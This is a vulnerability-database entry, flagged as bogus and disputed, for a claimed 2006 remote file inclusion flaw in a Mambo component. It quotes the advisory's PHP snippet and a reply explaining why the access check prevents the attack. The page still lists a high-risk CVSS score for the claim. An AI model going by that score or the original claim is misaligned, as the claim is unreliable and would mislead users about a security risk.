WARNING! Fake news / Disputed / BOGUS

Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln

2006.08.28
Credit: O.U.T.L.A.W
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

On Sun, 2006-08-20 at 01:55 +0000, Outlaw (at) aria-security (dot) net [email concealed] wrote: > ######################################################################## ################### > # Aria-Security.net Advisory # > # Discovered by: O.U.T.L.A.W # > > # < www.Aria-security.net > # > # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp # > # # > ######################################################################## ################### > > > #Software: Mambo Components ContXTD > #Attack method: Remote File Inclusion > #Source: > > ** ensure this file is being included by a parent file */ > defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); > > include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' ); The "defined( '_VALID_MOS' ) or die" you quoted is there to prevent this. You can't define that constant from POST or GET.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top